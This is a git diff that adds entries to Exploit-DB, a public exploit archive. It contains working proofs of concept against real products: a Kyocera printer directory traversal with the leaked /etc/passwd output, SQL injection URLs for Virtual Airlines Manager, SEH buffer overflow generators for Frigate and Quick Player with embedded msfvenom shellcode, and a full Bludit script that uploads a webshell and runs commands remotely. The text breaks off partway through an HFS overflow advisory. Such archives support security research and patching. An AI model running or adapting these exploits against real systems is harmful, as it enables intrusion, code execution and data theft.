000000000..b053e1597 --- /dev/null +++ b/exploits/hardware/webapps/48561.txt @@ -0,0 +1,68 @@ +# Exploit Title : Kyocera Printer d-COPIA253MF - Directory Traversal (PoC) +# Exploit Author: Hakan Eren ŞAN +# Date: 2020-06-06 +# Vendor Homepage: https://www.kyoceradocumentsolutions.com.tr/tr.html +# Version: d-COPIA253MF plus +# Tested on : Linux +# Credit: Berat Isler + + +# First step , you can capture the main page +# Then create a directory traveral payload like ../../../ this +# Then you add nullbyte to the end of the payload(%00) +# Last step sent your request + +This is the code : + +Request: + + +GET /wlmeng/../../../../../../../../../../../etc/passwd%00index.htm HTTP/1.1 +Host: X.X.X.X +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) +Gecko/20100101 Firefox/76.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: rtl=0 +Upgrade-Insecure-Requests: 1 +If-None-Match: "/wlmeng/index.htm, Thu, 04 Jun 2020 13:41:16 GMT" +Cache-Control: max-age=0 + + +Response: + +HTTP/1.1 200 OK +Content-Length: 843 +Date: Thu, 04 Jun 2020 16:09:54 GMT +Server: KM-MFP-http/V0.0.1 +Last-Modified: Thu, 04 Jun 2020 13:41:16 GMT +ETag: "/wlmeng/../../../../../../../../../../../etc/passwd, Thu, 04 Jun +2020 13:41:16 GMT" +Content-Type: text/html + +root::0:0:root:/root:/bin/sh +bin:*:1:1:bin:/bin:/bin/sh +daemon:*:2:2:daemon:/usr/sbin:/bin/sh +sys:*:3:3:sys:/dev:/bin/sh +adm:*:4:4:adm:/var/adm:/bin/sh +lp:*:5:7:lp:/var/spool/lpd:/bin/sh +sync:*:6:8:sync:/bin:/bin/sync +shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown +halt:*:8:10:halt:/sbin:/sbin/halt +mail:*:9:11:mail:/var/mail:/bin/sh +news:*:10:12:news:/var/spool/news:/bin/sh +uucp:*:11:13:uucp:/var/spool/uucp:/bin/sh +operator:*:12:0:operator:/root:/bin/sh +games:*:13:60:games:/usr/games:/bin/sh +ftp:*:15:14:ftp:/var/ftp:/bin/sh +man:*:16:20:man:/var/cache/man:/bin/sh +www:*:17:18:www-data:/var/www:/bin/sh +sshd:*:18:19:sshd:/var/run/sshd:/bin/sh +proxy:*:19:21:proxy:/bin:/bin/sh +telnetd:*:20:22:proxy:/bin:/bin/sh +backup:*:34:34:backup:/var/backups:/bin/sh +ais:*:101:101:ais:/var/run/ais:/bin/sh +nobody:*:65534:65534:nobody:/nonexistent:/bin/sh \ No newline at end of file diff --git a/exploits/php/webapps/48562.txt b/exploits/php/webapps/48562.txt new file mode 100644 index 000000000..10c1394f9 --- /dev/null +++ b/exploits/php/webapps/48562.txt @@ -0,0 +1,23 @@ +# Exploit Title: Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection +# Date: 2020-06-07 +# Exploit Author: Pankaj Kumar Thakur +# Vendor Homepage: http://virtualairlinesmanager.net/ +# Dork: inurl:notam_id= +# Affected Version: 2.6.2 +# Tested on: Ubuntu +# CVE : N/A + +Vulnerable parameter +------------------- +notam_id=%27%27 + +Id parameter's value is going into sql query directly! + +Proof of concept +--------------- +https://localhost:8080/vam/index.php?page=notam¬am_id=11%27%27 + + +Submitted: Jun 1 2020 +Fixed: Jun 5 2020 +Acknowledgement : https://ibb.co/Y3WYdFN \ No newline at end of file diff --git a/exploits/windows/local/48563.py b/exploits/windows/local/48563.py new file mode 100755 index 000000000..4aad4c2a0 --- /dev/null +++ b/exploits/windows/local/48563.py @@ -0,0 +1,70 @@ +# Exploit Title: Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC) +# Vendor Homepage: http://www.frigate3.com/ +# Software Link Download: http://www.frigate3.com/download/frigate3_pro.exe +# Exploit Author: Paras Bhatia +# Discovery Date: 2020-06-07 +# Vulnerable Software: Frigate +# Version: <= 3.36.0.9 +# Vulnerability Type: Local Buffer Overflow +# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) + +#Steps to Produce the Crash: + +# 1.- Run python code: FrigateLCE.py +# 2.- Copy content to clipboard +# 3.- Turn off DEP for Frigate3.exe +# 4.- Open "Frigate3.exe" +# 5.- Go to "Command" > "Command Line" > "Activate Command Line" +# 6.- Paste ClipBoard into the "Command Line" field which appears at the bottom of the Frigate application. +# 7.- Press Enter from Keyboard. +# 7.- Click on OK in the dialog box that appears. +# 8.- Calc.exe runs. + + +################################################################################################################################################# + +#Python "FrigateLCE.py" Code: + +f= open("FrigateLCE.txt", "w") + +junk="A" * 4112 + +nseh="\xeb\x20\x90\x90" + +seh="\x4B\x0C\x01\x40" + +#40010C4B 5B POP EBX +#40010C4C 5D POP EBP +#40010C4D C3 RETN +#POP EBX ,POP EBP, RETN | [rtl60.bpl] (C:\Program Files\Frigate3\rtl60.bpl) + +nops="\x90" * 50 + +# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed -b "\x00\x14\x09\x0a\x0d" -f python + +buf = "" +buf += "\xbf\xe3\xfa\x7b\x97\xdb\xd5\xd9\x74\x24\xf4\x5d\x2b" +buf += "\xc9\xb1\x30\x83\xed\xfc\x31\x7d\x0f\x03\x7d\xec\x18" +buf += "\x8e\x6b\x1a\x5e\x71\x94\xda\x3f\xfb\x71\xeb\x7f\x9f" +buf += "\xf2\x5b\xb0\xeb\x57\x57\x3b\xb9\x43\xec\x49\x16\x63" +buf += "\x45\xe7\x40\x4a\x56\x54\xb0\xcd\xd4\xa7\xe5\x2d\xe5" +buf += "\x67\xf8\x2c\x22\x95\xf1\x7d\xfb\xd1\xa4\x91\x88\xac" +buf += "\x74\x19\xc2\x21\xfd\xfe\x92\x40\x2c\x51\xa9\x1a\xee" +buf += "\x53\x7e\x17\xa7\x4b\x63\x12\x71\xe7\x57\xe8\x80\x21" +buf += "\xa6\x11\x2e\x0c\x07\xe0\x2e\x48\xaf\x1b\x45\xa0\xcc" +buf += "\xa6\x5e\x77\xaf\x7c\xea\x6c\x17\xf6\x4c\x49\xa6\xdb" +buf += "\x0b\x1a\xa4\x90\x58\x44\xa8\x27\x8c\xfe\xd4\xac\x33" +buf += "\xd1\x5d\xf6\x17\xf5\x06\xac\x36\xac\xe2\x03\x46\xae" +buf += "\x4d\xfb\xe2\xa4\x63\xe8\x9e\xe6\xe9\xef\x2d\x9d\x5f" +buf += "\xef\x2d\x9e\xcf\x98\x1c\x15\x80\xdf\xa0\xfc\xe5\x10" +buf += "\xeb\x5d\x4f\xb9\xb2\x37\xd2\xa4\x44\xe2\x10\xd1\xc6" +buf += "\x07\xe8\x26\xd6\x6d\xed\x63\x50\x9d\x9f\xfc\x35\xa1" +buf += "\x0c\xfc\x1f\xc2\xd3\x6e\xc3\x05" + + + + +payload = junk + nseh + seh + nops + buf + +f.write(payload) +f.close \ No newline at end of file diff --git a/exploits/windows/local/48564.py b/exploits/windows/local/48564.py new file mode 100755 index 000000000..14c4c2602 --- /dev/null +++ b/exploits/windows/local/48564.py @@ -0,0 +1,90 @@ +# Exploit Title: Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH) +# Date: 2020-06-05 +# Author: Felipe Winsnes +# Software Link: http://download.cnet.com/Quick-Player/3640-2168_4-10871418.html +# Version: 1.3 +# Tested on: Windows 7 + +# Proof of Concept: + +# 1.- Run the python script "poc.py", it will create a new file "poc.m3l" +# 2.- Open the application, +# 3.- Click on the bottom-right button with the letters "PL" +# 4.- Select the option "File" +# 5.- Click "Load List" +# 6.- Select poc.m3l +# 7.- Profit + +# Blog where the vulnerability is discussed: https://whitecr0wz.github.io/posts/Exploiting-Quick-Player/ +# Direct proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings6/18.gif + +# msfvenom -p windows/messagebox TEXT=pwned! -e x86/unicode_mixed -f py EXITFUNC=thread BufferRegister=EAX +# Payload size: 640 bytes + +buf = b"" +buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" +buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" +buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41" +buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51" +buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31" +buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41" +buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41" +buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41" +buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41" +buf += b"\x47\x42\x39\x75\x34\x4a\x42\x37\x69\x5a\x4b\x73\x6b" +buf += b"\x59\x49\x71\x64\x6f\x34\x69\x64\x70\x31\x4a\x32\x47" +buf += b"\x42\x61\x67\x6e\x51\x35\x79\x43\x34\x64\x4b\x62\x51" +buf += b"\x4c\x70\x64\x4b\x70\x76\x5a\x6c\x64\x4b\x74\x36\x4d" +buf += b"\x4c\x44\x4b\x51\x36\x4b\x58\x64\x4b\x71\x6e\x6d\x50" +buf += b"\x64\x4b\x4d\x66\x4e\x58\x70\x4f\x6b\x68\x31\x65\x4a" +buf += b"\x53\x62\x39\x49\x71\x78\x51\x79\x6f\x58\x61\x53\x30" +buf += b"\x42\x6b\x52\x4c\x6b\x74\x4f\x34\x52\x6b\x50\x45\x6d" +buf += b"\x6c\x72\x6b\x6e\x74\x4c\x68\x33\x48\x69\x71\x4a\x4a" +buf += b"\x52\x6b\x70\x4a\x6a\x78\x32\x6b\x31\x4a\x4d\x50\x6a" +buf += b"\x61\x6a\x4b\x79\x53\x6e\x54\x4e\x69\x44\x4b\x6f\x44" +buf += b"\x54\x4b\x6d\x31\x5a\x4e\x6d\x61\x39\x6f\x4e\x51\x69" +buf += b"\x30\x49\x6c\x46\x4c\x45\x34\x45\x70\x52\x54\x7a\x67" +buf += b"\x35\x71\x66\x6f\x5a\x6d\x49\x71\x77\x57\x58\x6b\x59" +buf += b"\x64\x4d\x6b\x73\x4c\x4d\x54\x6d\x58\x32\x55\x59\x51" +buf += b"\x34\x4b\x4f\x6a\x4b\x74\x4d\x31\x6a\x4b\x71\x56\x62" +buf += b"\x6b\x7a\x6c\x70\x4b\x34\x4b\x6e\x7a\x6d\x4c\x6b\x51" +buf += b"\x48\x6b\x62\x6b\x5a\x64\x44\x4b\x59\x71\x5a\x48\x52" +buf += b"\x69\x71\x34\x6d\x54\x4b\x6c\x71\x51\x46\x63\x37\x42" +buf += b"\x4c\x48\x6c\x69\x38\x54\x62\x69\x58\x65\x52\x69\x79" +buf += b"\x32\x72\x48\x44\x4e\x6e\x6e\x4c\x4e\x78\x6c\x32\x32" +buf += b"\x5a\x48\x45\x4f\x49\x6f\x49\x6f\x4b\x4f\x53\x59\x71" +buf += b"\x35\x69\x74\x77\x4b\x7a\x4f\x68\x4e\x49\x50\x51\x50" +buf += b"\x64\x47\x4b\x6c\x6c\x64\x31\x42\x49\x58\x52\x6e\x59" +buf += b"\x6f\x39\x6f\x49\x6f\x62\x69\x71\x35\x7a\x68\x33\x38" +buf += b"\x30\x6c\x52\x4c\x6b\x70\x4e\x61\x71\x58\x4d\x63\x50" +buf += b"\x32\x4e\x4e\x4f\x74\x52\x48\x71\x65\x34\x33\x32\x45" +buf += b"\x31\x62\x4e\x50\x77\x6b\x62\x68\x71\x4c\x4e\x44\x4a" +buf += b"\x6a\x52\x69\x6b\x36\x6e\x76\x79\x6f\x4f\x65\x6a\x64" +buf += b"\x55\x39\x35\x72\x72\x30\x65\x6b\x56\x48\x77\x32\x6e" +buf += b"\x6d\x75\x6c\x74\x47\x6d\x4c\x4f\x34\x62\x32\x5a\x48" +buf += b"\x51\x4f\x4b\x4f\x49\x6f\x39\x6f\x73\x38\x70\x6f\x71" +buf += b"\x68\x31\x48\x4b\x70\x53\x38\x50\x61\x4f\x77\x43\x35" +buf += b"\x71\x32\x51\x58\x30\x4d\x30\x65\x72\x53\x53\x43\x6e" +buf += b"\x51\x57\x6b\x63\x58\x6f\x6c\x6b\x74\x6a\x6a\x45\x39" +buf += b"\x39\x53\x62\x48\x71\x54\x4d\x51\x6e\x78\x6d\x50\x61" +buf += b"\x58\x70\x70\x31\x67\x32\x4e\x51\x55\x4d\x61\x69\x39" +buf += b"\x72\x68\x6e\x6c\x6d\x54\x4b\x56\x33\x59\x48\x61\x4e" +buf += b"\x51\x49\x42\x4f\x62\x30\x53\x4e\x71\x51\x42\x79\x6f" +buf += b"\x38\x50\x6e\x51\x75\x70\x32\x30\x69\x6f\x32\x35\x4c" +buf += b"\x48\x41\x41" + +alignment = "\x54\x71" # push esp, padding +alignment += "\x58\x71" # pop eax, padding +alignment += "\x05\x20\x22" # add eax, 0x22002000 +alignment += "\x71" # Padding +alignment += "\x2D\x19\x22" # sub eax, 0x22001900 +alignment += "\x71" # Padding +alignment += "\x50\x71" # push eax, padding +alignment += "\xC3" # retn + +ret = "\x71\x41" + "\xF2\x41" # 0x004100f2 : pop esi # pop ebx # ret 0x04 | startnull,unicode {PAGE_EXECUTE_READWRITE} [Quick Player.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.3.0.0 (C:\Program Files\Quick Player\Quick Player.exe) + +buffer = "A" * 536 + ret + "\x41\x71\x41\x71" + alignment + "A" * 73 + buf + "A" * 200 +f = open ("poc.m3l", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1cf93bd8b..1a7e1ec38 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11085,6 +11085,8 @@ id,file,description,date,author,type,platform,port 48510,exploits/windows/local/48510.py,"GoldWave - Buffer Overflow (SEH Unicode)",2020-05-25,"Andy Bowden",local,windows, 48517,exploits/windows/local/48517.py,"StreamRipper32 2.6 - Buffer Overflow (PoC)",2020-05-26,"Andy Bowden",local,windows, 48543,exploits/windows/local/48543.txt,"IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path",2020-06-04,Gobinathan,local,windows, +48563,exploits/windows/local/48563.py,"Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC)",2020-06-08,"Paras Bhatia",local,windows, +48564,exploits/windows/local/48564.py,"Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH)",2020-06-08,"Felipe Winsnes",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42787,3 +42789,5 @@ id,file,description,date,author,type,platform,port 48558,exploits/multiple/webapps/48558.txt,"Cayin Digital Signage System xPost 2.5 - Remote Command Injection",2020-06-04,LiquidWorm,webapps,multiple, 48559,exploits/php/webapps/48559.txt,"Online Course Registration 1.0 - Authentication Bypass",2020-06-05,BKpatron,webapps,php, 48560,exploits/php/webapps/48560.py,"Online-Exam-System 2015 - 'feedback' SQL Injection",2020-06-05,"Gus Ralph",webapps,php, +48561,exploits/hardware/webapps/48561.txt,"Kyocera Printer d-COPIA253MF - Directory Traversal (PoC)",2020-06-08,"Hakan Eren ŞAN",webapps,hardware, +48562,exploits/php/webapps/48562.txt,"Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection",2020-06-08,"Pankaj Kumar Thakur",webapps,php, From 809b91dc6fd22a233babb33fb8cd3fc7f88057a2 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 10 Jun 2020 05:02:06 +0000 Subject: [PATCH 10/17] DB: 2020-06-10 2 changes to exploits/shellcodes Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection Bludit 3.9.12 - Directory Traversal --- exploits/php/webapps/48567.txt | 64 ++++++++++++++++++ exploits/php/webapps/48568.py | 114 +++++++++++++++++++++++++++++++++ files_exploits.csv | 2 + 3 files changed, 180 insertions(+) create mode 100644 exploits/php/webapps/48567.txt create mode 100755 exploits/php/webapps/48568.py diff --git a/exploits/php/webapps/48567.txt b/exploits/php/webapps/48567.txt new file mode 100644 index 000000000..930f42f52 --- /dev/null +++ b/exploits/php/webapps/48567.txt @@ -0,0 +1,64 @@ +# Exploit Title: Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection +# Google Dork: N/A +# Date: 2020-06-08 +# Exploit Author: Kostadin Tonev +# Vendor Homepage: http://virtualairlinesmanager.net +# Software Link: https://virtualairlinesmanager.net/index.php/vam-releases/ +# Version: 2.6.2 +# Tested on: Linux Mint +# CVE : N/A + +. . . . . . . . . + . + . . : . .. :. .___---------___. + . . . . :.:. _".^ .^ ^. '.. :"-_. . + . : . . .:../: . .^ :.:\. + . . :: +. :.:/: . . . . . .:\ + . : . . _ :::/: . ^ . . .:\ + .. . . . - : :.:./. . .:\ + . . . :..|: . . ^. .:| + . . : : ..|| . . . !:| + . . . . ::. ::\( . :)/ + . . : . : .:.|. ###### .#######::| + :.. . :- : .: ::|.####### ..########:| + . . . .. . .. :\ ######## :######## :/ + . .+ :: : -.:\ ######## . ########.:/ + . .+ . . . . :.:\. ####### #######..:/ + :: . . . . ::.:..:.\ . . ..:/ + . . . .. : -::::.\. | | . .:/ + . : . . .-:.":.::.\ ..:/ + . -. . . . .: .:::.:.\. .:/ +. . . : : ....::_:..:\ ___. :/ + . . . .:. .. . .: :.:.:\ :/ + + . . : . ::. :.:. .:.|\ .:/| + . + . . ...:: ..| --.:| +. . . . . . . ... :..:.."( ..)" + . . . : . .: ::/ . .::\ + + + +[1] Vulnerable GET parameter: notam_id=[SQLi] +[PoC] http://localhost/vam/index.php?page=notam¬am_id=[SQLi] + +[2] Vulnerable GET parameter: airport=[SQLi] +[PoC] http://localhost/vam/index.php?page=airport_info&airport=[SQLi] + +[3] Vulnerable GET parameter: registry_id=[SQLi] +[PoC] http://localhost/vam/index.php?page=plane_info_public®istry_id=[SQLi] + +[4] Vulnerable GET parameter: plane_location=[SQLi] +[PoC] http://localhost/vam/index.php?page=fleet_public&plane_location=[SQLi] + +[5] Vulnerable GET parameter: hub_id=[SQLi] +[PoC] http://localhost/vam/index.php?page=hub&hub_id=[SQLi] + +[6] Vulnerable GET parameter: pilot_id=[SQLi] +[PoC] http://localhost/vam/index.php?page=pilot_details&pilot_id=[SQLi] + +[7] Vulnerable GET parameter: registry_id=[SQLi] +[PoC] http://localhost/vam/index.php?page=plane_info_public®istry_id=[SQLi] + +[8] Vulnerable GET parameter: event_id=[SQLi] +[PoC] http://localhost/vam/index.php?page=event&event_id=[SQLi] + +[9] Vulnerable GET parameter: tour_id=[SQLi] +[PoC] http://localhost/vam/index.php?page=tour_detail&tour_id=[SQLi] \ No newline at end of file diff --git a/exploits/php/webapps/48568.py b/exploits/php/webapps/48568.py new file mode 100755 index 000000000..556fdcdf8 --- /dev/null +++ b/exploits/php/webapps/48568.py @@ -0,0 +1,114 @@ +# Exploit Title: Bludit 3.9.12 - Directory Traversal +# Date: 2020-06-05 +# Exploit Author: Luis Vacacas +# Vendor Homepage: https://www.bludit.com +# Software Link: https://github.com/bludit/bludit +# Version: >= 3.9.12 +# Tested on: Ubuntu 19.10 +# CVE : CVE-2019-16113 + +#!/usr/bin/env python3 +#-*- coding: utf-8 -*- +import requests +import re +import argparse +import random +import string +import base64 +from requests.exceptions import Timeout + + +class Color: + PURPLE = '\033[95m' + CYAN = '\033[96m' + DARKCYAN = '\033[36m' + BLUE = '\033[94m' + GREEN = '\033[92m' + YELLOW = '\033[93m' + RED = '\033[91m' + BOLD = '\033[1m' + UNDERLINE = '\033[4m' + END = '\033[0m' + +banner = base64.b64decode("4pWU4pWXIOKUrCAg4pSsIOKUrOKUjOKUrOKUkOKUrOKUjOKUrOKUkCAg4pWU4pWQ4pWX4pWmIOKVpuKVlOKVl+KVlArilaDilanilZfilIIgIOKUgiDilIIg4pSC4pSC4pSCIOKUgiAgIOKVoOKVkOKVneKVkeKVkeKVkeKVkeKVkeKVkQrilZrilZDilZ3ilLTilIDilJjilJTilIDilJjilIDilLTilJjilLQg4pS0ICAg4pWpICDilZrilanilZ3ilZ3ilZrilZ0KCiBDVkUtMjAxOS0xNjExMyBDeWJlclZhY2EKCg==").decode() + +print(Color.RED + Color.BOLD + "\n\n" + banner + Color.END) + +def get_args(): + parser = argparse.ArgumentParser(description='Bludit RCE Exploit v3.9.2 CVE-2019-16113 \nBy @CyberVaca') + parser.add_argument('-u', dest='url', type=str, required=True, help='Url Bludit') + parser.add_argument('-user', dest='user', type=str,required=True, help='Username') + parser.add_argument('-pass', dest='password', type=str, required=True, help='Password' ) + parser.add_argument('-c', dest='command', type=str, required=True, help='Command to execute' ) + return parser.parse_args() + + + +def randomString(stringLength=8): + letters = string.ascii_lowercase + return ''.join(random.choice(letters) for i in range(stringLength)) + + +def informa(msg): + print (Color.GREEN + "[" + Color.RED + "+" + Color.GREEN + "] " + msg) + +def login(url,username,password): + session = requests.Session() + login_page = session.get(url + "/admin/") + csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1) + informa("csrf_token: " + Color.END + csrf_token) + la_cookie = ((login_page.headers['Set-Cookie']).split(";")[0].split("=")[1]) + paramsPost = {"save":"","password":password,"tokenCSRF":csrf_token,"username":username} + headers = {"Origin":url,"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer": url + "/admin/","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate","Content-Type":"application/x-www-form-urlencoded"} + cookies = {"BLUDIT-KEY":la_cookie} + response = session.post(url + "/admin/", data=paramsPost, headers=headers, cookies=cookies, allow_redirects = False) + informa("cookie: " + Color.END + la_cookie) + return(la_cookie) + + +def csrf_logado(url,la_cookie): + session = requests.Session() + headers = {"Origin":url,"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer":url + "/admin/","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate"} + cookies = {"BLUDIT-KEY":la_cookie} + response = session.get(url + "/admin/dashboard", headers=headers, cookies=cookies) + token_logado = response.text.split('var tokenCSRF = "')[1].split('"')[0] + informa("csrf_token: " + Color.END + token_logado) + return token_logado + +def subida_shell(url,la_cookie,token_logado,command,webshell): + session = requests.Session() + paramsPost = {"uuid":"../../tmp","tokenCSRF":token_logado} + paramsMultipart = [('images[]', (webshell, "", 'application/octet-stream'))] + headers = {"Origin":url,"Accept":"*/*","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer":url + "/admin/new-content","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate"} + cookies = {"BLUDIT-KEY":la_cookie} + response = session.post(url + "/admin/ajax/upload-images", data=paramsPost, files=paramsMultipart, headers=headers, cookies=cookies) + informa("Uploading " + Color.END + webshell + Color.END) + +def subida_htaccess(url,la_cookie,token_logado): + session = requests.Session() + paramsPost = {"uuid":"../../tmp","tokenCSRF":token_logado} + paramsMultipart = [('images[]', ('.htaccess', "RewriteEngine off\r\nAddType application/x-httpd-php .jpg", 'application/octet-stream'))] + headers = {"Origin":url,"Accept":"*/*","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer":url + "/admin/new-content","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate"} + cookies = {"BLUDIT-KEY":la_cookie} + response = session.post(url + "/admin/ajax/upload-images", data=paramsPost, files=paramsMultipart, headers=headers, cookies=cookies) + +def trigger_command(url,webshell,command): + session = requests.Session() + headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate"} + try: + response = session.get(url + "/bl-content/tmp/" + webshell, headers=headers, timeout=1) + except requests.exceptions.ReadTimeout: + pass + informa("Executing command: " + Color.END + command ) + informa("Delete: " + Color.END + ".htaccess") + informa("Delete: " + Color.END + webshell) + + +if __name__ == '__main__': + args = get_args() + webshell = randomString(8) + ".jpg" + la_cookie = login(args.url,args.user,args.password) + token_logado = csrf_logado(args.url,la_cookie) + subida_shell(args.url,la_cookie,token_logado,args.command,webshell) + subida_htaccess(args.url,la_cookie,token_logado) + trigger_command(args.url,webshell,args.command) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1a7e1ec38..d49a0543a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -42791,3 +42791,5 @@ id,file,description,date,author,type,platform,port 48560,exploits/php/webapps/48560.py,"Online-Exam-System 2015 - 'feedback' SQL Injection",2020-06-05,"Gus Ralph",webapps,php, 48561,exploits/hardware/webapps/48561.txt,"Kyocera Printer d-COPIA253MF - Directory Traversal (PoC)",2020-06-08,"Hakan Eren ŞAN",webapps,hardware, 48562,exploits/php/webapps/48562.txt,"Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection",2020-06-08,"Pankaj Kumar Thakur",webapps,php, +48567,exploits/php/webapps/48567.txt,"Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection",2020-06-09,"Kostadin Tonev",webapps,php, +48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php, From 6ec646f7e1df8e5faa786a2fb16c987e1f3d709e Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 11 Jun 2020 05:02:06 +0000 Subject: [PATCH 11/17] DB: 2020-06-11 10 changes to exploits/shellcodes Sync Breeze Enterprise 10.0.28 - Denial of-Service (PoC) Sync Breeze Enterprise 10.4.18 - Denial of-Service (PoC) Savant Web Server 3.1 - Denial of-Service (PoC) ALLPlayer 7.5 - Denial of-Service (PoC) 10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR) WinGate 9.4.1.5998 - Insecure Folder Permissions HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC) Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin) Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Virtual Airlines Manager 2.6.2 - 'id' SQL Injection --- exploits/multiple/remote/48569.py | 192 ++++++++++++++++++++++++++++++ exploits/php/webapps/48571.txt | 40 +++++++ exploits/php/webapps/48572.txt | 39 ++++++ exploits/php/webapps/48574.txt | 24 ++++ exploits/windows/dos/38079.py | 26 ++++ exploits/windows/dos/43197.py | 8 ++ exploits/windows/dos/43200.py | 33 +++++ exploits/windows/dos/44481.py | 31 +++++ exploits/windows/local/48570.py | 98 +++++++++++++++ exploits/windows/local/48573.txt | 101 ++++++++++++++++ files_exploits.csv | 10 ++ 11 files changed, 602 insertions(+) create mode 100755 exploits/multiple/remote/48569.py create mode 100644 exploits/php/webapps/48571.txt create mode 100644 exploits/php/webapps/48572.txt create mode 100644 exploits/php/webapps/48574.txt create mode 100755 exploits/windows/dos/38079.py create mode 100755 exploits/windows/dos/43197.py create mode 100755 exploits/windows/dos/43200.py create mode 100755 exploits/windows/dos/44481.py create mode 100755 exploits/windows/local/48570.py create mode 100644 exploits/windows/local/48573.txt diff --git a/exploits/multiple/remote/48569.py b/exploits/multiple/remote/48569.py new file mode 100755 index 000000000..279d9ad17 --- /dev/null +++ b/exploits/multiple/remote/48569.py @@ -0,0 +1,192 @@ +# Exploit Title: HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC) +# Date: 2020-06-05 +# Exploit Author: hyp3rlinx +# Vendor Homepage: www.rejetto.com +# CVE : CVE-2020-13432 + +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/HFS-HTTP-FILE-SERVER-v2.3-REMOTE-BUFFER-OVERFLOW-DoS.txt +[+] twitter.com/hyp3rlinx +[+] ISR: ApparitionSec + + +[Vendor] +www.rejetto.com + + +[Product] +HFS Http File Server v2.3m Build 300 + + +[Vulnerability Type] +Remote Buffer Overflow (DoS) + + +[CVE Reference] +CVE-2020-13432 + + +[Security Issue] +rejetto HFS (aka HTTP File Server) v2.3m Build #300, when virtual +files or folders are used, allows remote attackers to trigger an +invalid-pointer write access violation via concurrent HTTP requests +with a long URI or long HTTP headers like Cookie, User-Agent etc. + +Remote unauthenticated attackers can send concurrent HTTP requests +using an incrementing or specific payload range of junk characters for +values in the URL parameters or HTTP headers sent to the 